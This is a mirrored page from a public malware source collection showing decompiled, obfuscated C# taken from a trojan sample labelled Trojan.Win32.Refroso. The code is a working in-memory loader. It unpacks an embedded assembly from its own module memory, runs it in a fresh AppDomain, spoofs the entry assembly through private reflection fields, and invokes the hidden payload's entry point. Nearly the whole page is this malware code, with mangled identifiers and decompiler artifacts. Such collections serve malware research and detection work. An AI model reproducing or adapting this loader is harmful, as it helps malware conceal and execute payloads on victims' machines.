mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-24 12:25:29 +00:00
282 lines
8.2 KiB
C#
282 lines
8.2 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: é.Ù
|
|||
|
// Assembly: Cursor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: BB91517D-96CD-4859-A72C-BFC1CBA44DE2
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Refroso.hqmj-a46444251debd74675b60bb330cf99debe122ec24698468f4a3835595fddbe4e.exe
|
|||
|
|
|||
|
using \u0081é;
|
|||
|
using \u0082\u00BC;
|
|||
|
using System;
|
|||
|
using System.Reflection;
|
|||
|
using System.Runtime.InteropServices;
|
|||
|
|
|||
|
namespace \u0081é
|
|||
|
{
|
|||
|
[Serializable]
|
|||
|
internal class \u0081Ù
|
|||
|
{
|
|||
|
private IntPtr \u0082\u00B0;
|
|||
|
private IntPtr á;
|
|||
|
private int Þ;
|
|||
|
private Assembly Û;
|
|||
|
|
|||
|
private unsafe Assembly \u00F7()
|
|||
|
{
|
|||
|
byte* numPtr = (byte*) \u0082\u00BB.î((byte*) this.\u0082\u00B0.ToPointer());
|
|||
|
if ((IntPtr) numPtr == IntPtr.Zero)
|
|||
|
return (Assembly) null;
|
|||
|
IntPtr ptr = (IntPtr) (void*) numPtr;
|
|||
|
int length1 = Marshal.ReadInt32(ptr);
|
|||
|
IntPtr source = (IntPtr) (void*) (numPtr + 4);
|
|||
|
byte[] rawAssembly = new byte[length1];
|
|||
|
byte[] destination = rawAssembly;
|
|||
|
int length2 = length1;
|
|||
|
Marshal.Copy(source, destination, 0, length2);
|
|||
|
Assembly assembly = Assembly.Load(rawAssembly);
|
|||
|
Marshal.FreeCoTaskMem(ptr);
|
|||
|
return assembly;
|
|||
|
}
|
|||
|
|
|||
|
private unsafe Assembly \u0089()
|
|||
|
{
|
|||
|
byte* numPtr = (byte*) \u0082\u00BB.ô((byte*) this.\u0082\u00B0.ToPointer());
|
|||
|
if ((IntPtr) numPtr == IntPtr.Zero)
|
|||
|
return (Assembly) null;
|
|||
|
IntPtr ptr = (IntPtr) (void*) numPtr;
|
|||
|
string stringAnsi = Marshal.PtrToStringAnsi(ptr);
|
|||
|
Marshal.FreeCoTaskMem(ptr);
|
|||
|
Assembly assembly = (Assembly) null;
|
|||
|
try
|
|||
|
{
|
|||
|
assembly = Assembly.Load(stringAnsi);
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
}
|
|||
|
return assembly;
|
|||
|
}
|
|||
|
|
|||
|
public static unsafe int \u0081Ö(Assembly _param0, int _param1)
|
|||
|
{
|
|||
|
// ISSUE: untyped stack allocation
|
|||
|
int num1 = (int) __untypedstackalloc(\u0082\u00BB.Õ());
|
|||
|
IntPtr hinstance = Marshal.GetHINSTANCE(_param0.GetLoadedModules()[0]);
|
|||
|
int num2 = 0;
|
|||
|
\u0081Ù ù = new \u0081Ù();
|
|||
|
ù.Û = _param0;
|
|||
|
ù.\u0082\u00B0 = hinstance;
|
|||
|
ù.Þ = _param1;
|
|||
|
IntPtr num3 = (IntPtr) (void*) &num2;
|
|||
|
ù.á = num3;
|
|||
|
AppDomain domain = AppDomain.CreateDomain(Guid.NewGuid().ToString());
|
|||
|
int id = domain.Id;
|
|||
|
domain.AssemblyResolve += new ResolveEventHandler(\u0081Ù.ç);
|
|||
|
CrossAppDomainDelegate callBackDelegate = new CrossAppDomainDelegate(ù.í);
|
|||
|
domain.DoCallBack(callBackDelegate);
|
|||
|
try
|
|||
|
{
|
|||
|
AppDomain.Unload(domain);
|
|||
|
}
|
|||
|
catch (Exception ex1) when (
|
|||
|
{
|
|||
|
// ISSUE: unable to correctly present filter
|
|||
|
uint exceptionCode = (uint) Marshal.GetExceptionCode();
|
|||
|
if (\u0082\u00BB.\u0082\u00AE((void*) Marshal.GetExceptionPointers(), (void*) 0, 0, (void*) 0) != 0)
|
|||
|
{
|
|||
|
SuccessfulFiltering;
|
|||
|
}
|
|||
|
else
|
|||
|
throw;
|
|||
|
}
|
|||
|
)
|
|||
|
{
|
|||
|
uint num4 = 0;
|
|||
|
\u0082\u00BB.\u0081\u009A((void*) Marshal.GetExceptionPointers(), (void*) num1);
|
|||
|
try
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
}
|
|||
|
catch (Exception ex2) when (
|
|||
|
{
|
|||
|
// ISSUE: unable to correctly present filter
|
|||
|
num4 = (uint) \u0082\u00BB.\u0084((void*) Marshal.GetExceptionPointers());
|
|||
|
if (num4 != 0U)
|
|||
|
{
|
|||
|
SuccessfulFiltering;
|
|||
|
}
|
|||
|
else
|
|||
|
throw;
|
|||
|
}
|
|||
|
)
|
|||
|
{
|
|||
|
}
|
|||
|
goto label_10;
|
|||
|
if (num4 != 0U)
|
|||
|
throw;
|
|||
|
}
|
|||
|
finally
|
|||
|
{
|
|||
|
\u0082\u00BB.ã((void*) num1, (int) num4);
|
|||
|
}
|
|||
|
}
|
|||
|
label_10:
|
|||
|
\u0082\u00BB.ù();
|
|||
|
\u0082\u00BB.\u0095(id);
|
|||
|
return num2;
|
|||
|
}
|
|||
|
|
|||
|
public unsafe void í()
|
|||
|
{
|
|||
|
FieldInfo fieldInfo = (FieldInfo) null;
|
|||
|
// ISSUE: untyped stack allocation
|
|||
|
int num1 = (int) __untypedstackalloc(\u0082\u00BB.Õ());
|
|||
|
Assembly entryAssembly = Assembly.GetEntryAssembly();
|
|||
|
uint exceptionCode;
|
|||
|
if ((object) entryAssembly == null)
|
|||
|
{
|
|||
|
\u0081ê.\u0081\u0099 = this.Û;
|
|||
|
try
|
|||
|
{
|
|||
|
fieldInfo = (FieldInfo) null;
|
|||
|
AppDomain currentDomain = AppDomain.CurrentDomain;
|
|||
|
AppDomainManager appDomainManager = currentDomain.DomainManager;
|
|||
|
if (appDomainManager == null)
|
|||
|
{
|
|||
|
appDomainManager = new AppDomainManager();
|
|||
|
typeof (AppDomain).GetField("_domainManager", BindingFlags.Instance | BindingFlags.NonPublic)?.SetValue((object) currentDomain, (object) appDomainManager);
|
|||
|
}
|
|||
|
typeof (AppDomainManager).GetField("m_entryAssembly", BindingFlags.Instance | BindingFlags.NonPublic)?.SetValue((object) appDomainManager, (object) entryAssembly);
|
|||
|
}
|
|||
|
catch (Exception ex1) when (
|
|||
|
{
|
|||
|
// ISSUE: unable to correctly present filter
|
|||
|
exceptionCode = (uint) Marshal.GetExceptionCode();
|
|||
|
if (\u0082\u00BB.\u0082\u00AE((void*) Marshal.GetExceptionPointers(), (void*) 0, 0, (void*) 0) != 0)
|
|||
|
{
|
|||
|
SuccessfulFiltering;
|
|||
|
}
|
|||
|
else
|
|||
|
throw;
|
|||
|
}
|
|||
|
)
|
|||
|
{
|
|||
|
uint num2 = 0;
|
|||
|
\u0082\u00BB.\u0081\u009A((void*) Marshal.GetExceptionPointers(), (void*) num1);
|
|||
|
try
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
}
|
|||
|
catch (Exception ex2) when (
|
|||
|
{
|
|||
|
// ISSUE: unable to correctly present filter
|
|||
|
num2 = (uint) \u0082\u00BB.\u0084((void*) Marshal.GetExceptionPointers());
|
|||
|
if (num2 != 0U)
|
|||
|
{
|
|||
|
SuccessfulFiltering;
|
|||
|
}
|
|||
|
else
|
|||
|
throw;
|
|||
|
}
|
|||
|
)
|
|||
|
{
|
|||
|
}
|
|||
|
goto label_18;
|
|||
|
if (num2 != 0U)
|
|||
|
throw;
|
|||
|
}
|
|||
|
finally
|
|||
|
{
|
|||
|
\u0082\u00BB.ã((void*) num1, (int) num2);
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
else
|
|||
|
\u0081ê.\u0081\u0099 = entryAssembly;
|
|||
|
label_18:
|
|||
|
Assembly assembly = (Assembly) null;
|
|||
|
switch (this.Þ & 805306368)
|
|||
|
{
|
|||
|
case 536870912:
|
|||
|
assembly = this.\u0089();
|
|||
|
break;
|
|||
|
case 805306368:
|
|||
|
assembly = this.\u00F7();
|
|||
|
break;
|
|||
|
}
|
|||
|
if ((object) assembly == null)
|
|||
|
return;
|
|||
|
MethodInfo entryPoint = assembly.EntryPoint;
|
|||
|
if ((object) entryPoint == null)
|
|||
|
return;
|
|||
|
object[] parameters = new object[0];
|
|||
|
if (entryPoint.GetParameters().Length != 0)
|
|||
|
{
|
|||
|
string[] commandLineArgs = Environment.GetCommandLineArgs();
|
|||
|
string[] destinationArray = new string[commandLineArgs.Length - 1];
|
|||
|
int length = destinationArray.Length;
|
|||
|
if (length != 0)
|
|||
|
Array.Copy((Array) commandLineArgs, 1, (Array) destinationArray, 0, length);
|
|||
|
parameters = new object[1]
|
|||
|
{
|
|||
|
(object) destinationArray
|
|||
|
};
|
|||
|
}
|
|||
|
object obj = entryPoint.Invoke((object) null, parameters);
|
|||
|
if (obj == null)
|
|||
|
return;
|
|||
|
try
|
|||
|
{
|
|||
|
Marshal.WriteInt32(this.á, Convert.ToInt32(obj));
|
|||
|
}
|
|||
|
catch (Exception ex3) when (
|
|||
|
{
|
|||
|
// ISSUE: unable to correctly present filter
|
|||
|
exceptionCode = (uint) Marshal.GetExceptionCode();
|
|||
|
if (\u0082\u00BB.\u0082\u00AE((void*) Marshal.GetExceptionPointers(), (void*) 0, 0, (void*) 0) != 0)
|
|||
|
{
|
|||
|
SuccessfulFiltering;
|
|||
|
}
|
|||
|
else
|
|||
|
throw;
|
|||
|
}
|
|||
|
)
|
|||
|
{
|
|||
|
uint num3 = 0;
|
|||
|
\u0082\u00BB.\u0081\u009A((void*) Marshal.GetExceptionPointers(), (void*) num1);
|
|||
|
try
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
}
|
|||
|
catch (Exception ex4) when (
|
|||
|
{
|
|||
|
// ISSUE: unable to correctly present filter
|
|||
|
num3 = (uint) \u0082\u00BB.\u0084((void*) Marshal.GetExceptionPointers());
|
|||
|
if (num3 != 0U)
|
|||
|
{
|
|||
|
SuccessfulFiltering;
|
|||
|
}
|
|||
|
else
|
|||
|
throw;
|
|||
|
}
|
|||
|
)
|
|||
|
{
|
|||
|
}
|
|||
|
return;
|
|||
|
if (num3 == 0U)
|
|||
|
return;
|
|||
|
throw;
|
|||
|
}
|
|||
|
finally
|
|||
|
{
|
|||
|
\u0082\u00BB.ã((void*) num1, (int) num3);
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public static Assembly ç(object _param0, ResolveEventArgs _param1) => \u0082\u00BB.\u0081õ(_param1.Name);
|
|||
|
}
|
|||
|
}
|